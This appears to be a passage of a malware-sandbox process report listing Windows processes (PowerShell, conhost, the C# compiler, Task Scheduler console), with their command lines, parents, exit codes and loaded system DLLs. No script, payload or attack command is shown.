c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
4176
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
580
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
5876
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
4136
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
5348
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll

PID
832
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
3420
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\system32\cryptnet.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll

PID
5220
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll

PID
1580
CMD
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qhtxu0wo.cmdline"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.7.2556.0 built by: NET471REL1
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\version.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\microsoft.net\framework64\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscorpehost.dll

PID
3740
CMD
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF066.tmp" "c:\Users\admin\AppData\Local\Temp\CSC3501E91C22C04217AEF1B5C3DF308F7.TMP"
Path
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52519.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\bcryptprimitives.dll

PID
248
CMD
"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc" /s
Path
C:\WINDOWS\system32\mmc.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
3221226540
Version:
Company
Microsoft Corporation
Description
Microsoft Management Console
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll

PID
4756
CMD
"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc" /s
